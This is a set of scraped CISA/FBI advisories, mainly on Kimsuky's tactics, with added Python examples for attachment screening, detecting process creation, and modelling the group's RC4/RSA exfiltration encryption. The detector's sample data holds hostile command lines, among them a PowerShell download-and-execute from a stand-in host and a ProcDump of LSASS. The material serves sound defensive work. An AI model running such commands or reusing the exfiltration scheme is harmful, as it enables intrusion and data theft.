<li>Implement a Domain-Based Message Authentication, Reporting & Conformance (DMARC) validation system.</li>
<li>Disable or block unnecessary remote services.</li>
<li>Limit access to remote services through centrally managed concentrators.</li>
<li>Deny direct remote access to internal systems or resources by using network proxies, gateways, and firewalls.</li>
<li>Limit unnecessary lateral communications.</li>
<li>Disable file and printer sharing services. If these services are required, use strong passwords or Active Directory authentication.</li>
<li>Ensure applications do not store sensitive data or credentials insecurely.</li>
<li>Enable a firewall on agency workstations, configured to deny unsolicited connection requests.</li>
<li>Disable unnecessary services on agency workstations and servers.</li>
<li>Scan for and remove suspicious email attachments; ensure any scanned attachment is its “true file type” (i.e., the extension matches the file header).</li>
<li>Monitor users’ web browsing habits; restrict access to suspicious or risky sites. Contact law enforcement or CISA immediately regarding any unauthorized network access identified.</li>
<li>Visit the MITRE ATT&CK techniques and tactics pages linked in the ATT&CK Profile section above for additional mitigation and detection strategies for this malicious activity targeting think tanks.</li>
</ul>
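<p>One way to implement the attachment-screening items above (block the listed extensions and unscannable containers, and verify the "true file type" against the file header), as an added example that is not CISA/FBI code; the signature table, the per-extension policy and the sample files are constructed assumptions:</p>

```python
"""Attachment screening as the mitigations above describe: block the listed
risky extensions, block containers AV cannot scan, and verify that an
attachment's claimed extension matches its file header ("true file type").
Added example, not CISA/FBI code; the signature table and sample files are
constructed for illustration."""
import io
import os
import zipfile
from typing import Tuple

# Extensions the advisory lists as commonly associated with malware.
BLOCKED_EXTENSIONS = {".scr", ".pif", ".cpl", ".dll", ".exe"}
# Containers the advisory suggests blocking because AV may not scan inside them.
UNSCANNABLE_CONTAINERS = {".zip"}

# Header signatures (assumption: a small subset of well-known magic numbers).
MAGIC = {
    b"MZ": "pe",            # Windows PE executables (.exe/.dll/.scr/.cpl)
    b"PK\x03\x04": "zip",   # ZIP archives, also the container for .docx/.xlsx
    b"%PDF": "pdf",
    b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1": "ole",  # legacy binary Office (.doc/.xls)
}

# Header kind each permitted extension must carry (assumption: site policy).
EXPECTED = {
    ".docx": "zip", ".xlsx": "zip",
    ".pdf": "pdf",
    ".doc": "ole", ".xls": "ole",
}


def sniff(data: bytes) -> str:
    """Return the file kind implied by the header bytes, or 'unknown'."""
    for signature, kind in MAGIC.items():
        if data.startswith(signature):
            return kind
    return "unknown"


def zip_is_ooxml(data: bytes) -> bool:
    """A genuine .docx/.xlsx is a ZIP that carries an OOXML content-types part."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as archive:
            return "[Content_Types].xml" in archive.namelist()
    except zipfile.BadZipFile:
        return False


def screen_attachment(filename: str, data: bytes) -> Tuple[str, str]:
    """Return (verdict, reason); verdict is 'block', 'quarantine' or 'allow'.
    Only the final extension counts, so 'invoice.pdf.exe' is judged as .exe."""
    ext = os.path.splitext(filename.lower())[1]
    if ext in BLOCKED_EXTENSIONS:
        return "block", "extension %s is on the block list" % ext
    if ext in UNSCANNABLE_CONTAINERS:
        return "block", "%s containers cannot be scanned" % ext
    expected = EXPECTED.get(ext)
    if expected is None:
        return "quarantine", "no policy for extension %r" % ext
    actual = sniff(data)
    if actual != expected:
        # The advisory's "true file type" check: the header, not the name, decides.
        return "block", "claims %s but header looks like %s" % (ext, actual)
    if expected == "zip" and not zip_is_ooxml(data):
        return "block", "%s is not an Office Open XML package" % ext
    return "allow", "extension matches file header"


def build_sample_docx() -> bytes:
    """Constructed minimal OOXML package (not a real document)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        archive.writestr("[Content_Types].xml", "<Types/>")
        archive.writestr("word/document.xml", "<w:document/>")
    return buf.getvalue()


def build_plain_zip() -> bytes:
    """Constructed ZIP with no OOXML parts, e.g. a renamed archive."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        archive.writestr("readme.txt", "hello")
    return buf.getvalue()


# Constructed sample attachments: (name, first bytes).
SAMPLES = [
    ("setup.exe", b"MZ\x90\x00\x03\x00"),          # blocked by extension
    ("invoice.pdf.exe", b"MZ\x90\x00\x03\x00"),    # double extension, still .exe
    ("invoice.pdf", b"MZ\x90\x00\x03\x00"),        # PE renamed to .pdf
    ("report.pdf", b"%PDF-1.7\n%\xe2\xe3\xcf\xd3"),
    ("agenda.docx", build_sample_docx()),
    ("agenda.docx", build_plain_zip()),            # ZIP posing as a document
    ("archive.zip", b"PK\x03\x04"),                # unscannable container
]

if __name__ == "__main__":
    for name, content in SAMPLES:
        verdict, reason = screen_attachment(name, content)
        print("%-16s %-10s %s" % (name, verdict, reason))
```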
<h3>Contact Information</h3><p>Recipients of this report are encouraged to contribute any additional information that they may have related to this threat. To report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at <a href="http://www.fbi.gov/contact-us/field">www.fbi.gov/contact-us/field</a>, or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by email at <a href="mailto:CyWatch@fbi.gov">CyWatch@fbi.gov</a>. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at <a href="mailto:Central@cisa.gov">Central@cisa.gov</a>.</p>
<h3>References</h3>
<ul>
<li><a href=”https://us-cert.cisa.gov/ncas/alerts/aa20-120a”>CISA Alert: Microsoft Office 365 Security Recommendations</a></li>
<li><a href=”https://us-cert.cisa.gov/ncas/alerts/aa20-245a”>CISA Alert: Technical Approaches to Uncovering and Remediating Malicious Activity</a></li>
<li><a href=”https://www.cisa.gov/telework”>CISA Webpage: Telework Guidance</a></li>
<li><a href=”https://www.cisa.gov/vpn-related-guidance”>CISA Webpage: VPN-Related Guidance</a></li>
<li><a href=”http://image.communications.cyber.nj.gov/lib/fe3e15707564047c7c1270/m/2/PIN+-+4.9.2020.pdf”>FBI Private Industry Notification: PIN 20200409-001</a></li>
<li><a href="https://www.cyberscoop.com/european-think-tanks-hack-microsoft-fancy-bear-russia/">[1] CyberScoop: As Europe prepares to vote, Microsoft warns of Fancy Bear attacks on democratic think tanks</a></li>
</ul>
<h3>Revisions</h3>
<ul>
<li>Initial Version: December 1, 2020</li>
</ul>
AA20-304A: Iranian Advanced Persistent Threat Actor Identified Obtaining Voter Registration Data

Original release date: October 30, 2020
Summary
This advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) version 7 framework. See the ATT&CK for Enterprise version 7 for all referenced threat actor tactics and …
AA20-302A: Ransomware Activity Targeting the Healthcare and Public Health Sector
Original release date: October 28, 2020
Summary
This advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) version 7 framework. See the ATT&CK for Enterprise version 7 for all referenced threat actor tactics and …
AA20-301A: North Korean Advanced Persistent Threat Focus: Kimsuky
Original release date: October 27, 2020
Summary
This advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) version 7 framework. See the ATT&CK for Enterprise version 7 for all referenced threat actor tactics and techniques.
This joint cybersecurity advisory was coauthored by the Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the U.S. Cyber Command Cyber National Mission Force (CNMF). This advisory describes the tactics, techniques, and procedures (TTPs) used by North Korean advanced persistent threat (APT) group Kimsuky—against worldwide targets—to gain intelligence on various topics of interest to the North Korean government. The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA. For more information on HIDDEN COBRA activity, visit https://www.us-cert.cisa.gov/northkorea.
This advisory describes known Kimsuky TTPs, as found in open-source and intelligence reporting through July 2020. The target audience for this advisory is commercial sector businesses desiring to protect their networks from North Korean APT activity.
Click here for a PDF version of this report.
Key Findings
This advisory’s key findings are:
- The Kimsuky APT group has most likely been operating since 2012.
- Kimsuky is most likely tasked by the North Korean regime with a global intelligence gathering mission.
- Kimsuky employs common social engineering tactics, spearphishing, and watering hole attacks to exfiltrate desired information from victims.[1],[2]
- Kimsuky is most likely to use spearphishing to gain initial access into victim hosts or networks.[3]
- Kimsuky conducts its intelligence collection activities against individuals and organizations in South Korea, Japan, and the United States.
- Kimsuky focuses its intelligence collection activities on foreign policy and national security issues related to the Korean peninsula, nuclear policy, and sanctions.
- Kimsuky specifically targets:
- CISA, FBI, and CNMF recommend individuals and organizations within this target profile increase their defenses and adopt a heightened state of awareness. Particularly important mitigations include safeguards against spearphishing, use of multi-factor authentication, and user awareness training.
Technical Details
Initial Access
Kimsuky uses various spearphishing and social engineering methods to obtain Initial Access [TA0001] to victim networks.[9],[10],[11] Spearphishing—with a malicious attachment embedded in the email—is the most observed Kimsuky tactic (Phishing: Spearphishing Attachment [T1566.001]).[12],[13]
- The APT group has used web hosting credentials—stolen from victims outside of their usual targets—to host their malicious scripts and tools. Kimsuky likely obtained the credentials from the victims via spearphishing and credential harvesting scripts. On the victim domains, they have created subdomains mimicking legitimate sites and services they are spoofing, such as Google or Yahoo mail.[14]
- Kimsuky has also sent benign emails to targets, which were possibly intended to build trust in advance of a follow-on email with a malicious attachment or link.
- Posing as South Korean reporters, Kimsuky exchanged several benign interview-themed emails with their intended target to ostensibly arrange an interview date and possibly build rapport. The emails contained the subject line “Skype Interview requests of [Redacted TV Show] in Seoul,” and began with a request to have the recipient appear as a guest on the show. The APT group invited the targets to a Skype interview on the topic of inter-Korean issues and denuclearization negotiations on the Korean Peninsula.
- After a recipient agreed to an interview, Kimsuky sent a subsequent email with a malicious document, either as an attachment or as a Google Drive link within the body. The document usually contained a variant of BabyShark malware (see the Execution section for information on BabyShark). When the date of the interview drew near, Kimsuky sent an email canceling the interview.
- Kimsuky tailors its spearphishing and social engineering approaches to use topics relevant to the target, such as COVID-19, the North Korean nuclear program, or media interviews.[15],[16],[17]
Kimsuky’s other methods for obtaining initial access include login-security-alert-themed phishing emails, watering hole attacks, distributing malware through torrent sharing sites, and directing victims to install malicious browser extensions (Phishing: Spearphishing Link [T1566.002], Drive-by Compromise [T1189], Man-in-the-Browser [T1185]).[18]
Execution
After obtaining initial access, Kimsuky uses BabyShark malware and PowerShell or the Windows Command Shell for Execution [TA0002].
- BabyShark is Visual Basic Script (VBS)-based malware.
  - First, the compromised host system uses the native Microsoft Windows utility, mshta.exe, to download and execute an HTML application (HTA) file from a remote system (Signed Binary Proxy Execution: Mshta [T1218.005]).
  - The HTA file then downloads, decodes, and executes the encoded BabyShark VBS file.
  - The script maintains Persistence [TA0003] by creating a Registry key that runs on startup (Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder [T1547.001]).
  - It then collects system information (System Information Discovery [T1082]), sends it to the operator’s command and control (C2) servers, and awaits further commands.[19],[20],[21],[22]
- Open-source reporting indicates BabyShark is delivered via an email message containing a link or an attachment (see the Initial Access section for more information) (Phishing: Spearphishing Link [T1566.002], Phishing: Spearphishing Attachment [T1566.001]). Kimsuky tailors email phishing messages to match its targets’ interests. Observed targets have been U.S. think tanks and the global cryptocurrency industry.[23]
- Kimsuky uses PowerShell to run executables from the internet without touching the physical hard disk on a computer by using the target’s memory (Command and Scripting Interpreter: PowerShell [T1059.001]). PowerShell commands/scripts can be executed without invoking powershell.exe through HTA files or mshta.exe.[24],[25],[26],[27]
Persistence
Kimsuky has demonstrated the ability to establish Persistence [TA0003] through using malicious browser extensions, modifying system processes, manipulating the autostart execution, using Remote Desktop Protocol (RDP), and changing the default file association for an application. By using these methods, Kimsuky can gain login and password information and/or launch malware outside of some application allowlisting solutions.
- In 2018, Kimsuky used an extension, which was available on the Google Chrome Web Store, to infect victims and steal passwords and cookies from their browsers (Man-in-the-Browser [T1185]). The extension’s reviews gave it a five-star rating; however, the text of the reviews applied to other extensions or was negative. The reviews were likely left by compromised Google+ accounts.[28]
- Kimsuky may install a new service that can execute at startup by using utilities to interact with services or by directly modifying the Registry keys (Boot or Logon Autostart Execution [T1547]). The service name may be disguised with the name from a related operating system function or by masquerading as benign software. Services may be created with administrator privileges but are executed under system privileges, so an adversary can also use a service to escalate privileges from Administrator to System. They can also directly start services through Service Execution.[29],[30]
- During the STOLEN PENCIL operation in May 2018, Kimsuky used the GREASE malware. GREASE is a tool capable of adding a Windows administrator account and enabling RDP while avoiding firewall rules (Remote Services: Remote Desktop Protocol [T1021.001]).[31]
- Kimsuky uses a document stealer module that changes the default program associated with Hangul Word Processor (HWP) documents (
.hwp
files) in the Registry (Event Triggered Execution: Change Default File Association [T1546.001]). Kimsuky manipulates the default Registry setting to open a malicious program instead of the legitimate HWP program (HWP is a Korean word processor). The malware will read and email the content from HWP documents before the legitimate HWP program ultimately opens the document.[32] Kimsuky also targets Microsoft Office users by formatting their documents in a.docx
file rather than.hwp
and will tailor their macros accordingly.[33] - Kimsuky maintains access to compromised domains by uploading actor-modified versions of open-source Hypertext Processor (PHP)-based web shells; these web shells enable the APT actor to upload, download, and delete files and directories on the compromised domains (Server Software Component: Web Shell [T1505.003]). The actor often adds “Dinosaur” references within the modified web shell codes.[34]
Privilege Escalation
Kimsuky uses well-known methods for Privilege Escalation [TA0004]. These methods include placing scripts in the Startup folder, creating and running new services, changing default file associations, and injecting malicious code into explorer.exe.
- Kimsuky has used Win7Elevate, a User Account Control (UAC) bypass from the Metasploit framework, to inject malicious code into explorer.exe (Process Injection [T1055]). This malicious code decrypts its spying library (a collection of keystroke logging, remote control access, and remote download-and-execution tools) from its resources, regardless of the victim's operating system. It then saves the decrypted file to disk with a random-looking but hardcoded name (e.g., dfe8b437dd7c417a6d.tmp) in the user's temporary folder and loads this file as a library, ensuring the tools remain on the system even after a reboot. This allows for the escalation of privileges.[35]
- Before the injection takes place, the malware sets the necessary privileges (see figure 1). The malware writes the path to its malicious Dynamic Link Library (DLL) into the remote process and ensures the DLL is loaded by creating a remote thread within explorer.exe (Process Injection [T1055]).[36]
Figure 1: Privileges set for the injection [37]
Defense Evasion
Kimsuky uses well-known and widely available methods for Defense Evasion [TA0005] within a network. These methods include disabling security tools, deleting files, and using Metasploit.[38],[39]
- Kimsuky's malicious DLL runs at startup to zero (i.e., turn off) the Windows firewall Registry keys (see figure 2). This disables the Windows system firewall and turns off the Windows Security Center service, which prevents the service from alerting the user about the disabled firewall (Impair Defenses: Disable or Modify System Firewall [T1562.004]).[40]
Figure 2: Disabled firewall values in the Registry [41]
- Kimsuky has used a keylogger that deletes exfiltrated data on disk after it is transmitted to its C2 server (Indicator Removal on Host: File Deletion [T1070.004]).[42]
- Kimsuky has used mshta.exe, a utility that executes Microsoft HTML Applications (HTAs). It can be used for proxy execution of malicious .hta files and of JavaScript or VBScript through a trusted Windows utility (Signed Binary Proxy Execution: Mshta [T1218.005]). It can also be used to bypass application allowlisting solutions (Abuse Elevation Control Mechanism: Bypass User Account Control [T1548.002]).[43],[44]
- Win7Elevate, noted above, is also used to evade traditional security measures. Win7Elevate is part of the open-source Metasploit framework and is used to inject malicious code into explorer.exe (Process Injection [T1055]). The malicious code decrypts its spying library from its resources, saves the decrypted file to disk with a random-looking but hardcoded name in the victim's temporary folder, and loads the file as a library.[45],[46],[47]
Credential Access
Kimsuky uses legitimate tools and network sniffers to harvest credentials from web browsers, files, and keyloggers (Credential Access [TA0006]).
- Kimsuky uses memory dump programs instead of well-known malicious software and performs the credential extraction offline. Kimsuky uses ProcDump, a Windows command line administration tool, also available for Linux, that allows a user to create crash dumps/core dumps of processes based upon certain criteria, such as high central processing unit (CPU) utilization (OS Credential Dumping [T1003]). ProcDump monitors for CPU spikes and generates a crash dump when a threshold is met; it passes information to a Word document saved on the computer. It can be used as a general process dump utility that actors can embed in other scripts, as seen by Kimsuky's inclusion of ProcDump in the BabyShark malware.[48]
- According to open-source security researchers, Kimsuky abuses a Chrome extension to steal passwords and cookies from browsers (Man-in-the-Browser [T1185]).[49],[50] The spearphishing email directs a victim to a phishing site, where the victim is shown a benign PDF document but is not able to view it. The victim is then redirected to the official Chrome Web Store page to install a Chrome extension, which has the ability to steal cookies and site passwords and loads a JavaScript file, named jQuery.js, from a separate site (see figure 3).[51]
Figure 3: JavaScript file, named jQuery.js [52]
- Kimsuky also uses a PowerShell-based keylogger, named MECHANICAL, and a network sniffing tool, NirSoft SniffPass (Input Capture: Keylogging [T1056.001], Network Sniffing [T1040]). MECHANICAL logs keystrokes to %userprofile%\appdata\roaming\apach.{txt,log} and is also a "cryptojacker," a tool that uses a victim's computer to mine cryptocurrency. NirSoft SniffPass is capable of capturing passwords sent over non-secure protocols.[53]
- Kimsuky used actor-modified versions of PHProxy, an open-source web proxy written in PHP, to examine web traffic between the victim and the websites the victim accessed and to collect any credentials entered by the victim.[54]
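The Execution and Defense Evasion sections describe mshta.exe and in-memory PowerShell, and the ProcDump bullet above describes the LSASS dump; all three leave a process-creation trail. The following Python is an added example for this page, not code from the advisory or the cited reports. It runs four rules over process-creation events and returns the matches. The event records are constructed samples (no real incident data); their field names are a simplified form of Sysmon Event ID 1 fields (Image, ParentImage, CommandLine), and the hostnames in them use the reserved .invalid TLD.

```python
"""Triage of process-creation events for behaviours named in this advisory:
mshta.exe launching remote or dropped HTA content (T1218.005), PowerShell
pulling code from the internet and running it in memory (T1059.001), and
ProcDump used to dump LSASS (T1003)."""
import re

WRITABLE_DIRS = ("\\appdata\\", "\\temp\\", "\\programdata\\", "\\users\\public\\")
SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe")
URL_RE = re.compile(r"https?://", re.IGNORECASE)
PS_EXEC_RE = re.compile(r"\b(iex|invoke-expression)\b", re.IGNORECASE)
PS_FETCH_RE = re.compile(
    r"downloadstring|downloaddata|downloadfile|invoke-webrequest|\biwr\b|net\.webclient",
    re.IGNORECASE)
LSASS_RE = re.compile(r"\blsass(\.exe)?\b", re.IGNORECASE)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def mshta_remote_or_dropped(e) -> bool:
    """mshta.exe given a URL, or an HTA under a user-writable directory."""
    cmd = e["cmdline"].lower()
    return basename(e["image"]) == "mshta.exe" and (
        URL_RE.search(cmd) is not None or any(d in cmd for d in WRITABLE_DIRS))


def powershell_in_memory(e) -> bool:
    """Download primitive combined with Invoke-Expression: nothing hits disk."""
    return basename(e["image"]) in ("powershell.exe", "pwsh.exe") and bool(
        PS_EXEC_RE.search(e["cmdline"]) and PS_FETCH_RE.search(e["cmdline"]))


def spawned_by_mshta(e) -> bool:
    """A script host whose parent is mshta.exe: the HTA stage handing off."""
    return basename(e["parent"]) == "mshta.exe" and basename(e["image"]) in SCRIPT_HOSTS


def procdump_on_lsass(e) -> bool:
    """ProcDump naming LSASS on the command line. A dump taken by PID escapes
    this string match; resolve the PID against the process list for that case."""
    return basename(e["image"]).startswith("procdump") and LSASS_RE.search(e["cmdline"]) is not None


RULES = [
    ("T1218.005 mshta proxy execution", mshta_remote_or_dropped),
    ("T1059.001 PowerShell in-memory download/execute", powershell_in_memory),
    ("T1218.005 script host spawned by mshta", spawned_by_mshta),
    ("T1003 ProcDump against LSASS", procdump_on_lsass),
]


def triage(events) -> list:
    """Return (pid, rule name) for every rule each event matches."""
    return [(e["pid"], name) for e in events for name, match in RULES if match(e)]


# Constructed sample events (not from a real incident) mirroring the chain in
# the text: Word -> mshta -> PowerShell downloader, then ProcDump on LSASS.
SAMPLE_EVENTS = [
    {"pid": 101, "image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": "mshta.exe http://example.invalid/update.hta"},
    {"pid": 102, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\mshta.exe",
     "cmdline": "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('http://example.invalid/s.ps1')\""},
    {"pid": 103, "image": r"C:\Tools\procdump64.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"procdump64.exe -accepteula -ma lsass.exe C:\Users\Public\ls.dmp"},
    # Benign: a script run from disk, and an application dump taken by PID.
    {"pid": 104, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"powershell -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"},
    {"pid": 105, "image": r"C:\Tools\procdump64.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"procdump64.exe -accepteula -ma 4212 C:\dumps\app.dmp"},
]

if __name__ == "__main__":
    for pid, rule in triage(SAMPLE_EVENTS):
        print(pid, rule)
```

The parent-child rule matters more than the string rules: an HTA that launches PowerShell with an obfuscated or encoded command line defeats PS_EXEC_RE, but mshta.exe as the parent of a script host is still visible. Event 105 is deliberately not flagged, to show the gap a PID-based dump leaves in command-line matching.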
Discovery
Kimsuky enumerates system information and the file structure of victims' computers and networks (Discovery [TA0007]). Kimsuky appears to rely on the victim's operating system command prompt to enumerate the file structure and system information (File and Directory Discovery [T1083]). The output is directed to C:\WINDOWS\msdatl3.inc, read by the malware, and likely emailed to the malware's command server.[55]
Collection
Kimsuky collects data from the victim system through its HWP document malware and its keylogger (Collection [TA0009]). The HWP document malware changes the default program association in the Registry to open HWP documents (Event Triggered Execution: Change Default File Association [T1546.001]). When a user opens an HWP file, the Registry key change triggers the execution of malware that opens the HWP document and then sends a copy of it to an account under the adversary's control. The malware then allows the user to open the file as normal, without any indication that anything has occurred. The keylogger intercepts keystrokes, writes them to C:\Program Files\Common Files\System\Ole DB\msolui80.inc, and records the name of the active window in which the user pressed keys (Input Capture: Keylogging [T1056.001]). Another keylogger variant logs keystrokes to C:\WINDOWS\setup.log.[56]
Kimsuky has also used a macOS Python implant that gathers data from macOS systems and sends it to a C2 server (Command and Scripting Interpreter: Python [T1059.006]). The Python program downloads various implants based on C2 options specified after filedown.php (see figure 4).
Figure 4: Python script targeting macOS [57]
Command and Control
Kimsuky has used a modified TeamViewer client, version 5.0.9104, for Command and Control [TA0011] (Remote Access Software [T1219]). During the initial infection, the service "Remote Access Service" is created and configured to execute C:\Windows\System32\vcmon.exe at system startup (Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder [T1547.001]). Every time vcmon.exe is executed, it disables the firewall by zeroing out Registry values (Impair Defenses: Disable or Modify System Firewall [T1562.004]). The program then modifies the TeamViewer Registry settings by changing the TeamViewer strings in TeamViewer components. The launcher then configures several Registry values, including SecurityPasswordAES, that control how the remote access tool will work. The SecurityPasswordAES Registry value represents a hash of the password used by a remote user to connect to the TeamViewer client (Use Alternate Authentication Material: Pass the Hash [T1550.002]). In this way, the attackers set a pre-shared authentication value that grants them access to the TeamViewer client. The attacker then executes the TeamViewer client, netsvcs.exe.[58]
Kimsuky's C2 URLs have followed a consistent format. In a recently observed URL, express[.]php?op=1, the op parameter appears to range from 1 to 3.[59]
Exfiltration
Open-source reporting from cybersecurity companies describes two different methods Kimsuky has used to exfiltrate stolen data: via email, or over a channel protected by an RC4 key derived as the MD5 hash of a randomly generated 117-byte buffer (Exfiltration [TA0010]).
There was no indication that the actor destroyed computers during the observed exfiltrations, suggesting Kimsuky's intention is to steal information, not to disrupt computer networks. Kimsuky's preferred method for sending or receiving exfiltrated information is email, with its malware on the victim machine encrypting the data before sending it to a C2 server (Archive Collected Data [T1560]). Kimsuky also sets up auto-forward rules within a victim's email account (Email Collection: Email Forwarding Rule [T1114.003]).
In the second method, Kimsuky's malware generates a random 117-byte buffer and uses its MD5 hash as the RC4 key that encrypts the stolen data (Encrypted Channel: Symmetric Cryptography [T1573.001]). The malware constructs an 1120-bit RSA public key and uses it to encrypt the 117-byte buffer, so only the holder of the matching private key can recover the RC4 key and decrypt the data. The resulting data file is saved in C:\Program Files\Common Files\System\Ole DB\
(Data Staged: Local Data Staging [T1074.001]).[60]
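The scheme above is a standard hybrid construction: a fresh random buffer, a symmetric key derived from it, and the buffer wrapped with the actor's RSA public key. The Python below is an added example written for this page to make the data flow concrete; it is not the implant's code and the RSA key it generates is not the actor's key. Two assumptions are labelled in the code: the RSA operation is textbook (unpadded), since the advisory does not describe padding, and the staged file layout (wrapped buffer followed by ciphertext) is chosen here for illustration. The RC4 and MD5 steps and the 117-byte and 1120-bit sizes follow the text.

```python
"""Model of the described exfiltration cryptography: random 117-byte buffer,
RC4 key = MD5(buffer), buffer wrapped with an RSA public key. The RSA key is
generated fresh (textbook RSA, no padding: an assumption) to show the flow."""
import hashlib
import secrets

BUFFER_LEN = 117          # 936 bits, fits under the 1120-bit modulus
RSA_BITS = 1120           # modulus size named in the advisory


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 keystream XOR; the same call encrypts and decrypts."""
    S = list(range(256))
    j = 0
    for i in range(256):                       # key scheduling
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:                          # keystream generation
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def derive_rc4_key(buf: bytes) -> bytes:
    """RC4 key = MD5(117-byte buffer), 16 bytes."""
    if len(buf) != BUFFER_LEN:
        raise ValueError("buffer must be exactly 117 bytes")
    return hashlib.md5(buf).digest()


# ---- minimal RSA (Miller-Rabin primes, e = 65537), enough to wrap the buffer
SMALL_PRIMES = [2] + [p for p in range(3, 1000, 2)
                      if all(p % q for q in range(3, int(p ** 0.5) + 1, 2))]


def is_probable_prime(n: int, rounds: int = 20) -> bool:
    if n < 2:
        return False
    for p in SMALL_PRIMES:
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for _ in range(rounds):
        x = pow(secrets.randbelow(n - 3) + 2, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def gen_prime(bits: int) -> int:
    while True:
        cand = secrets.randbits(bits) | (3 << (bits - 2)) | 1   # top two bits set, odd
        if is_probable_prime(cand):
            return cand


def gen_rsa_keypair(bits: int = RSA_BITS):
    """Returns ((n, e), (n, d)); the modulus is exactly `bits` long."""
    e = 65537
    while True:
        p, q = gen_prime(bits // 2), gen_prime(bits - bits // 2)
        phi = (p - 1) * (q - 1)
        if p != q and phi % e:
            return (p * q, e), (p * q, pow(e, -1, phi))


def build_exfil_package(data: bytes, pub):
    """Implant side: fresh buffer -> RC4 key; RSA-wrap the buffer; RC4 the data.
    Returning (wrapped, ciphertext) as two parts is this example's layout."""
    n, e = pub
    buf = secrets.token_bytes(BUFFER_LEN)
    wrapped = pow(int.from_bytes(buf, "big"), e, n).to_bytes((n.bit_length() + 7) // 8, "big")
    return wrapped, rc4(derive_rc4_key(buf), data)


def open_exfil_package(wrapped: bytes, ciphertext: bytes, priv) -> bytes:
    """C2 side: unwrap the buffer with d, re-derive the RC4 key, decrypt.
    Without d, an analyst holding the staged file cannot perform this step."""
    n, d = priv
    buf = pow(int.from_bytes(wrapped, "big"), d, n).to_bytes(BUFFER_LEN, "big")
    return rc4(derive_rc4_key(buf), ciphertext)


if __name__ == "__main__":
    pub, priv = gen_rsa_keypair()
    wrapped, ct = build_exfil_package(b"contents of a stolen .hwp document", pub)
    print(len(wrapped), "byte wrapped key;", open_exfil_package(wrapped, ct, priv))
```

The forensic consequence is the point of the model: a file staged under the Ole DB directory carries a 140-byte RSA-wrapped blob and RC4 ciphertext, and the actor's private key is the only way to recover the RC4 key, so the value of the artifact lies in the staging location, the wrapped-key length, and the timing of its creation rather than in its content.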
Mitigations
Indicators of Compromise
Kimsuky has used the domains listed in table 1 to carry out its objectives:
For a downloadable copy of IOCs, see AA20-301A.stix.
Table 1: Domains used by Kimsuky
- member.daum.uniex[.]kr
Table 2: Redacted domains used by Kimsuky
Contact Information
To report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at www.fbi.gov/contact-us/field, or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at CyWatch@fbi.gov. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at Central@cisa.dhs.gov.
This information is provided “as is” for informational purposes only. The United States Government does not provide any warranties of any kind regarding this information. In no event shall the United States Government or its contractors or subcontractors be liable for any damages, including but not limited to, direct, indirect, special or consequential damages, arising out of, resulting from, or in any way connected with this information, whether or not based upon warranty, contract, tort, or otherwise, whether or not arising out of negligence, and whether or not injury was sustained from, or arose out of the results of, or reliance upon the information.
The United States Government does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the United States Government.
References
- [1] Netscout: Stolen Pencil Campaign Targets Academia
- [2] CYWARE Social: Babyshark malware continues to target nuclear and cryptocurrency industries
- [3] CYWARE Social: Babyshark malware continues to target nuclear and cryptocurrency industries
- [4] Netscout: Stolen Pencil Campaign Targets Academia
- [5] MITRE ATT&CK: Groups – Kimsuky
- [6] Securityweek.com: North Korean Suspected Cyber-espionage Attacks Against South Korea Entities
- [7] MITRE ATT&CK: Groups – Kimsuky
- [8] CrowdStrike: 2020 Global Threat Report
- [9] Malwarebytes: APTs and COVID-19: How advanced persistent threats use the coronavirus as a lure
- [10] PwC: Tracking ‘Kimsuky’, the North Korea-based cyber espionage group: Part 2
- [11] CrowdStrike: 2020 Global Threat Report
- [12] Netscout: Stolen Pencil Campaign Targets Academia
- [13] MITRE ATT&CK: Groups – Kimsuky
- [14] Private Sector Partner
- [15] CYWARE Social: Babyshark malware continues to target nuclear and cryptocurrency industries
